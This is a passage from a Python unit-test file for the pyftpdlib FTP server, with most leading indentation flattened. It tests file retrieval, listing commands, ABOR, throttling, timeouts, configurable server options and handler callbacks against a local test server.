self.dummy_recvfile = BytesIO()
self.dummy_sendfile = BytesIO()
def tearDown(self):
self.client.close()
self.server.stop()
self.dummy_recvfile.close()
self.dummy_sendfile.close()
safe_remove(TESTFN)
def test_fallback(self):
# Makes sure that if sendfile() fails and no bytes were
# transmitted yet the server falls back on using plain
# send()
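        # sendfile() is patched to fail with EINVAL before any byte is
        # sent, which is the condition under which falling back on plain
        # send() is possible.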
data = b'abcde12345' * 100000
self.dummy_sendfile.write(data)
self.dummy_sendfile.seek(0)
self.client.storbinary('stor ' + TESTFN, self.dummy_sendfile)
with mock.patch('pyftpdlib.handlers.sendfile',
side_effect=OSError(errno.EINVAL)) as fun:
try:
self.client.retrbinary(
'retr ' + TESTFN, self.dummy_recvfile.write)
assert fun.called
self.dummy_recvfile.seek(0)
datafile = self.dummy_recvfile.read()
self.assertEqual(len(data), len(datafile))
self.assertEqual(hash(data), hash(datafile))
finally:
# We do not use os.remove() because file could still be
# locked by ftpd thread. If DELE through FTP fails try
# os.remove() as last resort.
if os.path.exists(TESTFN):
try:
self.client.delete(TESTFN)
except (ftplib.Error, EOFError, socket.error):
safe_remove(TESTFN)
class TestFtpRetrieveData(unittest.TestCase):
"Test RETR, REST, TYPE"
server_class = FTPd
client_class = ftplib.FTP
def setUp(self):
self.server = self.server_class()
self.server.start()
self.client = self.client_class(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.client.login(USER, PASSWD)
self.file = open(TESTFN, 'w+b')
self.dummyfile = BytesIO()
def tearDown(self):
self.client.close()
self.server.stop()
if not self.file.closed:
self.file.close()
if not self.dummyfile.closed:
self.dummyfile.close()
safe_remove(TESTFN)
def test_retr(self):
data = b'abcde12345' * 100000
self.file.write(data)
self.file.close()
self.client.retrbinary("retr " + TESTFN, self.dummyfile.write)
self.dummyfile.seek(0)
datafile = self.dummyfile.read()
self.assertEqual(len(data), len(datafile))
self.assertEqual(hash(data), hash(datafile))
# attempt to retrieve a file which doesn't exist
bogus = os.path.basename(tempfile.mktemp(dir=HOME))
self.assertRaises(ftplib.error_perm, self.client.retrbinary,
"retr " + bogus, lambda x: x)
def test_retr_ascii(self):
# Test RETR in ASCII mode.
def retrieve(cmd, callback, blocksize=8192, rest=None):
# like retrbinary but uses TYPE A instead
self.client.voidcmd('type a')
with contextlib.closing(
self.client.transfercmd(cmd, rest)) as conn:
conn.settimeout(TIMEOUT)
while 1:
data = conn.recv(blocksize)
if not data:
break
callback(data)
return self.client.voidresp()
data = (b'abcde12345' + b(os.linesep)) * 100000
self.file.write(data)
self.file.close()
retrieve("retr " + TESTFN, self.dummyfile.write)
expected = data.replace(b(os.linesep), b'\r\n')
self.dummyfile.seek(0)
datafile = self.dummyfile.read()
self.assertEqual(len(expected), len(datafile))
self.assertEqual(hash(expected), hash(datafile))
@retry_before_failing()
def test_restore_on_retr(self):
data = b'abcde12345' * 1000000
self.file.write(data)
self.file.close()
received_bytes = 0
self.client.voidcmd('TYPE I')
with contextlib.closing(
self.client.transfercmd('retr ' + TESTFN)) as conn:
while 1:
chunk = conn.recv(BUFSIZE)
if not chunk:
break
self.dummyfile.write(chunk)
received_bytes += len(chunk)
if received_bytes >= INTERRUPTED_TRANSF_SIZE:
break
# transfer wasn't finished yet so we expect a 426 response
self.assertEqual(self.client.getline()[:3], "426")
# resuming transfer by using a marker value greater than the
# file size stored on the server should result in an error
# on retr (RFC-1123)
file_size = self.client.size(TESTFN)
self.client.sendcmd('rest %s' % ((file_size + 1)))
self.assertRaises(ftplib.error_perm, self.client.sendcmd,
'retr ' + TESTFN)
# test resume
self.client.sendcmd('rest %s' % received_bytes)
self.client.retrbinary("retr " + TESTFN, self.dummyfile.write)
self.dummyfile.seek(0)
datafile = self.dummyfile.read()
self.assertEqual(len(data), len(datafile))
self.assertEqual(hash(data), hash(datafile))
def test_retr_empty_file(self):
self.client.retrbinary("retr " + TESTFN, self.dummyfile.write)
self.dummyfile.seek(0)
self.assertEqual(self.dummyfile.read(), b"")
@unittest.skipUnless(POSIX, "POSIX only")
@unittest.skipIf(sys.version_info < (3, 3) and sendfile is None,
"pysendfile not installed")
class TestFtpRetrieveDataNoSendfile(TestFtpRetrieveData):
"""Test RETR, REST, TYPE by not using sendfile()."""
def setUp(self):
TestFtpRetrieveData.setUp(self)
self.server.handler.use_sendfile = False
def tearDown(self):
TestFtpRetrieveData.tearDown(self)
self.server.handler.use_sendfile = True
class TestFtpListingCmds(unittest.TestCase):
"""Test LIST, NLST, argumented STAT."""
server_class = FTPd
client_class = ftplib.FTP
def setUp(self):
self.server = self.server_class()
self.server.start()
self.client = self.client_class(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.client.login(USER, PASSWD)
touch(TESTFN)
def tearDown(self):
self.client.close()
self.server.stop()
os.remove(TESTFN)
def _test_listing_cmds(self, cmd):
"""Tests common to LIST NLST and MLSD commands."""
        # assume that no argument has the same meaning as "/"
        l1, l2 = [], []
self.client.retrlines(cmd, l1.append)
self.client.retrlines(cmd + ' /', l2.append)
self.assertEqual(l1, l2)
if cmd.lower() != 'mlsd':
# if pathname is a file one line is expected
x = []
self.client.retrlines('%s ' % cmd + TESTFN, x.append)
self.assertEqual(len(x), 1)
self.assertTrue(''.join(x).endswith(TESTFN))
# non-existent path, 550 response is expected
bogus = os.path.basename(tempfile.mktemp(dir=HOME))
self.assertRaises(ftplib.error_perm, self.client.retrlines,
'%s ' % cmd + bogus, lambda x: x)
        # for an empty directory we expect that the data channel is
        # opened anyway and that no data is received
x = []
tempdir = os.path.basename(tempfile.mkdtemp(dir=HOME))
try:
self.client.retrlines('%s %s' % (cmd, tempdir), x.append)
self.assertEqual(x, [])
finally:
safe_rmdir(tempdir)
def test_nlst(self):
# common tests
self._test_listing_cmds('nlst')
def test_list(self):
# common tests
self._test_listing_cmds('list')
        # known incorrect pathname arguments (e.g. old clients) are
        # expected to be treated as if the pathname were '/'
        l1, l2, l3, l4, l5 = [], [], [], [], []
self.client.retrlines('list /', l1.append)
self.client.retrlines('list -a', l2.append)
self.client.retrlines('list -l', l3.append)
self.client.retrlines('list -al', l4.append)
self.client.retrlines('list -la', l5.append)
tot = (l1, l2, l3, l4, l5)
for x in range(len(tot) - 1):
self.assertEqual(tot[x], tot[x + 1])
def test_mlst(self):
# utility function for extracting the line of interest
def mlstline(cmd):
return self.client.voidcmd(cmd).split('\n')[1]
# the fact set must be preceded by a space
self.assertTrue(mlstline('mlst').startswith(' '))
# where TVFS is supported, a fully qualified pathname is expected
self.assertTrue(mlstline('mlst ' + TESTFN).endswith('/' + TESTFN))
self.assertTrue(mlstline('mlst').endswith('/'))
        # assume that no argument has the same meaning as "/"
self.assertEqual(mlstline('mlst'), mlstline('mlst /'))
# non-existent path
bogus = os.path.basename(tempfile.mktemp(dir=HOME))
self.assertRaises(ftplib.error_perm, self.client.sendcmd,
'mlst ' + bogus)
# test file/dir notations
self.assertTrue('type=dir' in mlstline('mlst'))
self.assertTrue('type=file' in mlstline('mlst ' + TESTFN))
# let's add some tests for OPTS command
self.client.sendcmd('opts mlst type;')
self.assertEqual(mlstline('mlst'), ' type=dir; /')
# where no facts are present, two leading spaces before the
# pathname are required (RFC-3659)
self.client.sendcmd('opts mlst')
self.assertEqual(mlstline('mlst'), ' /')
def test_mlsd(self):
# common tests
self._test_listing_cmds('mlsd')
dir = os.path.basename(tempfile.mkdtemp(dir=HOME))
self.addCleanup(safe_rmdir, dir)
try:
self.client.retrlines('mlsd ' + TESTFN, lambda x: x)
except ftplib.error_perm as err:
resp = str(err)
# if path is a file a 501 response code is expected
self.assertEqual(str(resp)[0:3], "501")
else:
self.fail("Exception not raised")
def test_mlsd_all_facts(self):
feat = self.client.sendcmd('feat')
# all the facts
facts = re.search(r'^\s*MLST\s+(\S+)$', feat, re.MULTILINE).group(1)
facts = facts.replace("*;", ";")
self.client.sendcmd('opts mlst ' + facts)
resp = self.client.sendcmd('mlst')
local = facts[:-1].split(";")
returned = resp.split("\n")[1].strip()[:-3]
returned = [x.split("=")[0] for x in returned.split(";")]
self.assertEqual(sorted(local), sorted(returned))
self.assertTrue("type" in resp)
self.assertTrue("size" in resp)
self.assertTrue("perm" in resp)
self.assertTrue("modify" in resp)
if POSIX:
self.assertTrue("unique" in resp)
self.assertTrue("unix.mode" in resp)
self.assertTrue("unix.uid" in resp)
self.assertTrue("unix.gid" in resp)
elif WINDOWS:
self.assertTrue("create" in resp)
def test_stat(self):
# Test STAT provided with argument which is equal to LIST
self.client.sendcmd('stat /')
self.client.sendcmd('stat ' + TESTFN)
self.client.putcmd('stat *')
resp = self.client.getmultiline()
self.assertEqual(resp, '550 Globbing not supported.')
bogus = os.path.basename(tempfile.mktemp(dir=HOME))
self.assertRaises(ftplib.error_perm, self.client.sendcmd,
'stat ' + bogus)
def test_unforeseen_time_event(self):
# Emulate a case where the file last modification time is prior
# to year 1900. This most likely will never happen unless
        # someone specifically forces the last modification time of a
# file in some way.
# To do so we temporarily override os.path.getmtime so that it
# returns a negative value referring to a year prior to 1900.
        # It causes time.localtime/gmtime to raise a ValueError
        # exception which is supposed to be handled by the server.
_getmtime = AbstractedFS.getmtime
try:
AbstractedFS.getmtime = lambda x, y: -9000000000
self.client.sendcmd('stat /') # test AbstractedFS.format_list()
self.client.sendcmd('mlst /') # test AbstractedFS.format_mlsx()
# make sure client hasn't been disconnected
self.client.sendcmd('noop')
finally:
AbstractedFS.getmtime = _getmtime
class TestFtpAbort(unittest.TestCase):
"test: ABOR"
server_class = FTPd
client_class = ftplib.FTP
def setUp(self):
self.server = self.server_class()
self.server.start()
self.client = self.client_class(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.client.login(USER, PASSWD)
def tearDown(self):
self.client.close()
self.server.stop()
def test_abor_no_data(self):
# Case 1: ABOR while no data channel is opened: respond with 225.
resp = self.client.sendcmd('ABOR')
self.assertEqual('225 No transfer to abort.', resp)
self.client.retrlines('list', [].append)
def test_abor_pasv(self):
# Case 2: user sends a PASV, a data-channel socket is listening
# but not connected, and ABOR is sent: close listening data
# socket, respond with 225.
self.client.makepasv()
respcode = self.client.sendcmd('ABOR')[:3]
self.assertEqual('225', respcode)
self.client.retrlines('list', [].append)
def test_abor_port(self):
# Case 3: data channel opened with PASV or PORT, but ABOR sent
# before a data transfer has been started: close data channel,
# respond with 225
self.client.set_pasv(0)
with contextlib.closing(self.client.makeport()):
respcode = self.client.sendcmd('ABOR')[:3]
self.assertEqual('225', respcode)
self.client.retrlines('list', [].append)
def test_abor_during_transfer(self):
# Case 4: ABOR while a data transfer on DTP channel is in
# progress: close data channel, respond with 426, respond
# with 226.
data = b'abcde12345' * 1000000
with open(TESTFN, 'w+b') as f:
f.write(data)
try:
self.client.voidcmd('TYPE I')
with contextlib.closing(
self.client.transfercmd('retr ' + TESTFN)) as conn:
bytes_recv = 0
while bytes_recv < 65536:
chunk = conn.recv(BUFSIZE)
bytes_recv += len(chunk)
# stop transfer while it isn't finished yet
self.client.putcmd('ABOR')
# transfer isn't finished yet so ftpd should respond with 426
self.assertEqual(self.client.getline()[:3], "426")
# transfer successfully aborted, so should now respond
# with a 226
self.assertEqual('226', self.client.voidresp()[:3])
finally:
# We do not use os.remove() because file could still be
# locked by ftpd thread. If DELE through FTP fails try
# os.remove() as last resort.
try:
self.client.delete(TESTFN)
except (ftplib.Error, EOFError, socket.error):
safe_remove(TESTFN)
@unittest.skipUnless(hasattr(socket, 'MSG_OOB'), "MSG_OOB not available")
@unittest.skipIf(sys.version_info < (2, 6),
"does not work on python < 2.6")
@unittest.skipIf(OSX, "does not work on OSX")
def test_oob_abor(self):
# Send ABOR by following the RFC-959 directives of sending
# Telnet IP/Synch sequence as OOB data.
# On some systems like FreeBSD this happened to be a problem
# due to a different SO_OOBINLINE behavior.
# On some platforms (e.g. Python CE) the test may fail
# although the MSG_OOB constant is defined.
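        # chr(244) is the Telnet IP (Interrupt Process) code and
        # chr(255) the Telnet IAC marker.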
self.client.sock.sendall(b(chr(244)), socket.MSG_OOB)
self.client.sock.sendall(b(chr(255)), socket.MSG_OOB)
self.client.sock.sendall(b'abor\r\n')
self.assertEqual(self.client.getresp()[:3], '225')
class TestThrottleBandwidth(unittest.TestCase):
"""Test ThrottledDTPHandler class."""
server_class = FTPd
client_class = ftplib.FTP
def setUp(self):
class CustomDTPHandler(ThrottledDTPHandler):
# overridden so that the "awake" callback is executed
# immediately; this way we won't introduce any slowdown
# and still test the code of interest
def _throttle_bandwidth(self, *args, **kwargs):
ThrottledDTPHandler._throttle_bandwidth(self, *args, **kwargs)
if (self._throttler is not None and not
self._throttler.cancelled):
self._throttler.call()
self._throttler = None
self.server = self.server_class()
self.server.handler.dtp_handler = CustomDTPHandler
self.server.start()
self.client = self.client_class(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.client.login(USER, PASSWD)
self.dummyfile = BytesIO()
def tearDown(self):
self.client.close()
self.server.handler.dtp_handler.read_limit = 0
self.server.handler.dtp_handler.write_limit = 0
self.server.handler.dtp_handler = DTPHandler
self.server.stop()
if not self.dummyfile.closed:
self.dummyfile.close()
if os.path.exists(TESTFN):
os.remove(TESTFN)
def test_throttle_send(self):
# This test doesn't test the actual speed accuracy, just
# awakes all that code which implements the throttling.
self.server.handler.dtp_handler.write_limit = 32768
data = b'abcde12345' * 100000
with open(TESTFN, 'wb') as file:
file.write(data)
self.client.retrbinary("retr " + TESTFN, self.dummyfile.write)
self.dummyfile.seek(0)
datafile = self.dummyfile.read()
self.assertEqual(len(data), len(datafile))
self.assertEqual(hash(data), hash(datafile))
def test_throttle_recv(self):
# This test doesn't test the actual speed accuracy, just
# awakes all that code which implements the throttling.
self.server.handler.dtp_handler.read_limit = 32768
data = b'abcde12345' * 100000
self.dummyfile.write(data)
self.dummyfile.seek(0)
self.client.storbinary("stor " + TESTFN, self.dummyfile)
self.client.quit() # needed to fix occasional failures
with open(TESTFN, 'rb') as file:
file_data = file.read()
self.assertEqual(len(data), len(file_data))
self.assertEqual(hash(data), hash(file_data))
class TestTimeouts(unittest.TestCase):
"""Test idle-timeout capabilities of control and data channels.
Some tests may fail on slow machines.
"""
server_class = FTPd
client_class = ftplib.FTP
def setUp(self):
self.server = None
self.client = None
def _setUp(self, idle_timeout=300, data_timeout=300, pasv_timeout=30,
port_timeout=30):
self.server = self.server_class()
self.server.handler.timeout = idle_timeout
self.server.handler.dtp_handler.timeout = data_timeout
self.server.handler.passive_dtp.timeout = pasv_timeout
self.server.handler.active_dtp.timeout = port_timeout
self.server.start()
self.client = self.client_class(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.client.login(USER, PASSWD)
def tearDown(self):
if self.client is not None and self.server is not None:
self.client.close()
self.server.handler.timeout = 300
self.server.handler.dtp_handler.timeout = 300
self.server.handler.passive_dtp.timeout = 30
self.server.handler.active_dtp.timeout = 30
self.server.stop()
def test_idle_timeout(self):
# Test control channel timeout. The client which does not send
# any command within the time specified in FTPHandler.timeout is
# supposed to be kicked off.
self._setUp(idle_timeout=0.1)
# fail if no msg is received within 1 second
self.client.sock.settimeout(1)
data = self.client.sock.recv(BUFSIZE)
self.assertEqual(data, b"421 Control connection timed out.\r\n")
# ensure client has been kicked off
self.assertRaises((socket.error, EOFError), self.client.sendcmd,
'noop')
def test_data_timeout(self):
# Test data channel timeout. The client which does not send
# or receive any data within the time specified in
# DTPHandler.timeout is supposed to be kicked off.
self._setUp(data_timeout=0.1)
addr = self.client.makepasv()
with contextlib.closing(socket.socket()) as s:
s.settimeout(TIMEOUT)
s.connect(addr)
# fail if no msg is received within 1 second
self.client.sock.settimeout(1)
data = self.client.sock.recv(BUFSIZE)
self.assertEqual(data, b"421 Data connection timed out.\r\n")
# ensure client has been kicked off
self.assertRaises((socket.error, EOFError), self.client.sendcmd,
'noop')
def test_data_timeout_not_reached(self):
        # Impose a timeout for the data channel, then keep sending
        # data for longer than that to make sure the code checking
        # whether the transfer stalled with no progress is executed.
self._setUp(data_timeout=0.1)
with contextlib.closing(
self.client.transfercmd('stor ' + TESTFN)) as sock:
if hasattr(self.client_class, 'ssl_version'):
sock = ssl.wrap_socket(sock)
try:
stop_at = time.time() + 0.2
while time.time() < stop_at:
sock.send(b'x' * 1024)
sock.close()
self.client.voidresp()
finally:
if os.path.exists(TESTFN):
self.client.delete(TESTFN)
def test_idle_data_timeout1(self):
# Tests that the control connection timeout is suspended while
# the data channel is opened
self._setUp(idle_timeout=0.1, data_timeout=0.2)
addr = self.client.makepasv()
with contextlib.closing(socket.socket()) as s:
s.settimeout(TIMEOUT)
s.connect(addr)
# fail if no msg is received within 1 second
self.client.sock.settimeout(1)
data = self.client.sock.recv(BUFSIZE)
self.assertEqual(data, b"421 Data connection timed out.\r\n")
# ensure client has been kicked off
self.assertRaises((socket.error, EOFError), self.client.sendcmd,
'noop')
def test_idle_data_timeout2(self):
# Tests that the control connection timeout is restarted after
# data channel has been closed
self._setUp(idle_timeout=0.1, data_timeout=0.2)
addr = self.client.makepasv()
with contextlib.closing(socket.socket()) as s:
s.settimeout(TIMEOUT)
s.connect(addr)
# close data channel
self.client.sendcmd('abor')
self.client.sock.settimeout(1)
data = self.client.sock.recv(BUFSIZE)
self.assertEqual(data, b"421 Control connection timed out.\r\n")
# ensure client has been kicked off
self.assertRaises((socket.error, EOFError), self.client.sendcmd,
'noop')
def test_pasv_timeout(self):
# Test pasv data channel timeout. The client which does not
# connect to the listening data socket within the time specified
# in PassiveDTP.timeout is supposed to receive a 421 response.
self._setUp(pasv_timeout=0.1)
self.client.makepasv()
# fail if no msg is received within 1 second
self.client.sock.settimeout(1)
data = self.client.sock.recv(BUFSIZE)
self.assertEqual(data, b"421 Passive data channel timed out.\r\n")
# client is not expected to be kicked off
self.client.sendcmd('noop')
def test_disabled_idle_timeout(self):
self._setUp(idle_timeout=0)
self.client.sendcmd('noop')
def test_disabled_data_timeout(self):
self._setUp(data_timeout=0)
addr = self.client.makepasv()
with contextlib.closing(socket.socket()) as s:
s.settimeout(TIMEOUT)
s.connect(addr)
def test_disabled_pasv_timeout(self):
self._setUp(pasv_timeout=0)
self.client.makepasv()
# reset passive socket
addr = self.client.makepasv()
with contextlib.closing(socket.socket()) as s:
s.settimeout(TIMEOUT)
s.connect(addr)
def test_disabled_port_timeout(self):
self._setUp(port_timeout=0)
with contextlib.closing(self.client.makeport()):
with contextlib.closing(self.client.makeport()):
pass
class TestConfigurableOptions(unittest.TestCase):
"""Test those daemon options which are commonly modified by user."""
server_class = FTPd
client_class = ftplib.FTP
def setUp(self):
touch(TESTFN)
self.server = self.server_class()
self.server.start()
self.client = self.client_class(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.client.login(USER, PASSWD)
def tearDown(self):
os.remove(TESTFN)
# set back options to their original value
self.server.server.max_cons = 0
self.server.server.max_cons_per_ip = 0
self.server.handler.banner = "pyftpdlib ready."
self.server.handler.max_login_attempts = 3
self.server.handler.auth_failed_timeout = 5
self.server.handler.masquerade_address = None
self.server.handler.masquerade_address_map = {}
self.server.handler.permit_privileged_ports = False
self.server.handler.passive_ports = None
self.server.handler.use_gmt_times = True
self.server.handler.tcp_no_delay = hasattr(socket, 'TCP_NODELAY')
self.server.stop()
self.client.close()
@disable_log_warning
def test_max_connections(self):
# Test FTPServer.max_cons attribute
self.server.server.max_cons = 3
self.client.quit()
c1 = self.client_class()
c2 = self.client_class()
c3 = self.client_class()
try:
c1.connect(self.server.host, self.server.port)
c2.connect(self.server.host, self.server.port)
self.assertRaises(ftplib.error_temp, c3.connect, self.server.host,
self.server.port)
# with passive data channel established
c2.quit()
c1.login(USER, PASSWD)
c1.makepasv()
self.assertRaises(ftplib.error_temp, c2.connect, self.server.host,
self.server.port)
# with passive data socket waiting for connection
c1.login(USER, PASSWD)
c1.sendcmd('pasv')
self.assertRaises(ftplib.error_temp, c2.connect, self.server.host,
self.server.port)
# with active data channel established
c1.login(USER, PASSWD)
with contextlib.closing(c1.makeport()):
self.assertRaises(
ftplib.error_temp, c2.connect, self.server.host,
self.server.port)
finally:
for c in (c1, c2, c3):
try:
c.quit()
except (socket.error, EOFError): # already disconnected
c.close()
@disable_log_warning
def test_max_connections_per_ip(self):
# Test FTPServer.max_cons_per_ip attribute
self.server.server.max_cons_per_ip = 3
self.client.quit()
c1 = self.client_class()
c2 = self.client_class()
c3 = self.client_class()
c4 = self.client_class()
try:
c1.connect(self.server.host, self.server.port)
c2.connect(self.server.host, self.server.port)
c3.connect(self.server.host, self.server.port)
self.assertRaises(ftplib.error_temp, c4.connect, self.server.host,
self.server.port)
# Make sure client has been disconnected.
# socket.error (Windows) or EOFError (Linux) exception is
# supposed to be raised in such a case.
self.assertRaises((socket.error, EOFError), c4.sendcmd, 'noop')
finally:
for c in (c1, c2, c3, c4):
try:
c.quit()
except (socket.error, EOFError): # already disconnected
c.close()
def test_banner(self):
# Test FTPHandler.banner attribute
self.server.handler.banner = 'hello there'
self.client.close()
self.client = self.client_class(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.assertEqual(self.client.getwelcome()[4:], 'hello there')
def test_max_login_attempts(self):
# Test FTPHandler.max_login_attempts attribute.
self.server.handler.max_login_attempts = 1
self.server.handler.auth_failed_timeout = 0
self.assertRaises(ftplib.error_perm, self.client.login, 'wrong',
'wrong')
# socket.error (Windows) or EOFError (Linux) exceptions are
# supposed to be raised when attempting to send/recv some data
# using a disconnected socket
self.assertRaises((socket.error, EOFError), self.client.sendcmd,
'noop')
def test_masquerade_address(self):
# Test FTPHandler.masquerade_address attribute
host, port = self.client.makepasv()
self.assertEqual(host, self.server.host)
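        # "256.256.256.256" is deliberately not a valid IP address: the
        # configured value is expected to be echoed verbatim in the
        # PASV reply.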
self.server.handler.masquerade_address = "256.256.256.256"
host, port = self.client.makepasv()
self.assertEqual(host, "256.256.256.256")
def test_masquerade_address_map(self):
# Test FTPHandler.masquerade_address_map attribute
host, port = self.client.makepasv()
self.assertEqual(host, self.server.host)
self.server.handler.masquerade_address_map = {self.server.host:
"128.128.128.128"}
host, port = self.client.makepasv()
self.assertEqual(host, "128.128.128.128")
def test_passive_ports(self):
# Test FTPHandler.passive_ports attribute
_range = list(range(40000, 60000, 200))
self.server.handler.passive_ports = _range
self.assertTrue(self.client.makepasv()[1] in _range)
self.assertTrue(self.client.makepasv()[1] in _range)
self.assertTrue(self.client.makepasv()[1] in _range)
self.assertTrue(self.client.makepasv()[1] in _range)
@disable_log_warning
def test_passive_ports_busy(self):
# If the ports in the configured range are busy it is expected
# that a kernel-assigned port gets chosen
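        # bind a socket on the only port in the configured passive
        # range so that the server cannot use it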
with contextlib.closing(socket.socket()) as s:
s.settimeout(TIMEOUT)
s.bind((HOST, 0))
port = s.getsockname()[1]
self.server.handler.passive_ports = [port]
resulting_port = self.client.makepasv()[1]
self.assertTrue(port != resulting_port)
@disable_log_warning
def test_permit_privileged_ports(self):
        # Test FTPHandler.permit_privileged_ports attribute
# try to bind a socket on a privileged port
sock = None
for port in reversed(range(1, 1024)):
try:
socket.getservbyport(port)
except socket.error:
# not registered port; go on
try:
sock = socket.socket(self.client.af, socket.SOCK_STREAM)
sock.settimeout(TIMEOUT)
sock.bind((HOST, port))
break
except socket.error as err:
if err.errno == errno.EACCES:
# root privileges needed
if sock is not None:
sock.close()
sock = None
break
sock.close()
continue
else:
# registered port found; skip to the next one
continue
else:
# no usable privileged port was found
sock = None
        if sock is not None:
            self.addCleanup(sock.close)
self.server.handler.permit_privileged_ports = False
self.assertRaises(ftplib.error_perm, self.client.sendport, HOST,
port)
if sock:
port = sock.getsockname()[1]
self.server.handler.permit_privileged_ports = True
sock.listen(5)
sock.settimeout(TIMEOUT)
self.client.sendport(HOST, port)
s, addr = sock.accept()
s.close()
def test_use_gmt_times(self):
# use GMT time
self.server.handler.use_gmt_times = True
gmt1 = self.client.sendcmd('mdtm ' + TESTFN)
gmt2 = self.client.sendcmd('mlst ' + TESTFN)
gmt3 = self.client.sendcmd('stat ' + TESTFN)
# use local time
self.server.handler.use_gmt_times = False
self.client.quit()
self.client.connect(self.server.host, self.server.port)
self.client.login(USER, PASSWD)
loc1 = self.client.sendcmd('mdtm ' + TESTFN)
loc2 = self.client.sendcmd('mlst ' + TESTFN)
loc3 = self.client.sendcmd('stat ' + TESTFN)
# if we're not in a GMT time zone times are supposed to be
# different
if time.timezone != 0:
self.assertNotEqual(gmt1, loc1)
self.assertNotEqual(gmt2, loc2)
self.assertNotEqual(gmt3, loc3)
# ...otherwise they should be the same
else:
self.assertEqual(gmt1, loc1)
self.assertEqual(gmt2, loc2)
self.assertEqual(gmt3, loc3)
@unittest.skipUnless(hasattr(socket, 'TCP_NODELAY'),
'TCP_NODELAY not available')
def test_tcp_no_delay(self):
def get_handler_socket():
# return the server's handler socket object
ioloop = IOLoop.instance()
for fd in ioloop.socket_map:
instance = ioloop.socket_map[fd]
if isinstance(instance, FTPHandler):
break
return instance.socket
s = get_handler_socket()
self.assertTrue(s.getsockopt(socket.SOL_TCP, socket.TCP_NODELAY))
self.client.quit()
self.server.handler.tcp_no_delay = False
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
s = get_handler_socket()
self.assertFalse(s.getsockopt(socket.SOL_TCP, socket.TCP_NODELAY))
class TestCallbacks(unittest.TestCase):
"""Test FTPHandler class callback methods."""
server_class = FTPd
client_class = ftplib.FTP
def setUp(self):
self.client = None
self.server = None
self.file = None
self.dummyfile = None
def _setUp(self, handler, connect=True, login=True):
self.tearDown()
FTPd.handler = handler
self.server = self.server_class()
self.server.start()
self.client = self.client_class(timeout=TIMEOUT)
if connect:
self.client.connect(self.server.host, self.server.port)
if login:
self.client.login(USER, PASSWD)
self.file = open(TESTFN, 'w+b')
self.dummyfile = BytesIO()
self._tearDown = False
def tearDown(self):
if self.client is not None:
self.client.close()
if self.server is not None and self.server.running:
self.server.stop()
if self.file is not None:
self.file.close()
if self.dummyfile is not None:
self.dummyfile.close()
safe_remove(TESTFN)
def test_on_file_sent(self):
_file = []
class TestHandler(FTPHandler):
def on_file_sent(self, file):
_file.append(file)
self._setUp(TestHandler)
data = b'abcde12345' * 100000
self.file.write(data)
self.file.close()
self.client.retrbinary("retr " + TESTFN, lambda x: x)
# shut down the server to avoid race conditions
self.tearDown()
self.assertEqual(_file, [os.path.abspath(TESTFN)])
def test_on_file_received(self):
_file = []
class TestHandler(FTPHandler):
def on_file_received(self, file):
_file.append(file)
self._setUp(TestHandler)
data = b'abcde12345' * 100000
self.dummyfile.write(data)
self.dummyfile.seek(0)
self.client.storbinary('stor ' + TESTFN, self.dummyfile)
# shut down the server to avoid race conditions
self.tearDown()
self.assertEqual(_file, [os.path.abspath(TESTFN)])
@retry_before_failing()
def test_on_incomplete_file_sent(self):
_file = []
class TestHandler(FTPHandler):
def on_incomplete_file_sent(self, file):
_file.append(file)
self._setUp(TestHandler)
data = b'abcde12345' * 100000
self.file.write(data)
self.file.close()
bytes_recv = 0
with contextlib.closing(
self.client.transfercmd("retr " + TESTFN, None)) as conn:
while 1:
chunk = conn.recv(BUFSIZE)
bytes_recv += len(chunk)
if bytes_recv >= INTERRUPTED_TRANSF_SIZE or not chunk:
break
self.assertEqual(self.client.getline()[:3], "426")
# shut down the server to avoid race conditions
self.tearDown()
self.assertEqual(_file, [os.path.abspath(TESTFN)])
@unittest.skipIf(TRAVIS, "failing on Travis")
@retry_before_failing()
def test_on_incomplete_file_received(self):
_file = []
class TestHandler(FTPHandler):
def on_incomplete_file_received(self, file):
_file.append(file)
self._setUp(TestHandler)
data = b'abcde12345' * 100000
self.dummyfile.write(data)
self.dummyfile.seek(0)
with contextlib.closing(
self.client.transfercmd('stor ' + TESTFN)) as conn:
bytes_sent = 0
while 1:
chunk = self.dummyfile.read(BUFSIZE)
conn.sendall(chunk)
bytes_sent += len(chunk)
# stop transfer while it isn't finished yet
if bytes_sent >= INTERRUPTED_TRANSF_SIZE or not chunk:
self.client.putcmd('abor')
break
self.assertRaises(ftplib.error_temp, self.client.getresp) # 426
# shut down the server to avoid race conditions
self.tearDown()
self.assertEqual(_file, [os.path.abspath(TESTFN)])
def test_on_connect(self):
flag = []
class TestHandler(FTPHandler):
def on_connect(self):
flag.append(None)
self._setUp(TestHandler, connect=False)
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.assertTrue(flag)
def test_on_disconnect(self):
flag = []
class TestHandler(FTPHandler):
def on_disconnect(self):
flag.append(None)
self._setUp(TestHandler, connect=False)
self.client.connect(self.server.host, self.server.port)
self.assertFalse(flag)
self.client.sendcmd('quit')
try:
self.client.sendcmd('noop')
except (socket.error, EOFError):
pass
else:
self.fail('still connected')
self.tearDown()
self.assertTrue(flag)
def test_on_login(self):
user = []
class TestHandler(FTPHandler):
auth_failed_timeout = 0
def on_login(self, username):
user.append(username)
self._setUp(TestHandler)
# shut down the server to avoid race conditions
self.tearDown()
self.assertEqual(user, [USER])
def test_on_login_failed(self):
pair = []
class TestHandler(FTPHandler):
auth_failed_timeout = 0
def on_login_failed(self, username, password):
pair.append((username, password))
self._setUp(TestHandler, login=False)
self.assertRaises(ftplib.error_perm, self.client.login, 'foo', 'bar')
# shut down the server to avoid race conditions
self.tearDown()
self.assertEqual(pair, [('foo', 'bar')])
def test_on_logout_quit(self):
user = []
class TestHandler(FTPHandler):
def on_logout(self, username):
user.append(username)
self._setUp(TestHandler)
self.client.quit()
# shut down the server to avoid race conditions
self.tearDown()
self.assertEqual(user, [USER])
def test_on_logout_rein(self):
user = []
class TestHandler(FTPHandler):
def on_logout(self, username):
user.append(username)
self._setUp(TestHandler)
self.client.sendcmd('rein')
# shut down the server to avoid race conditions
self.tearDown()
self.assertEqual(user, [USER])
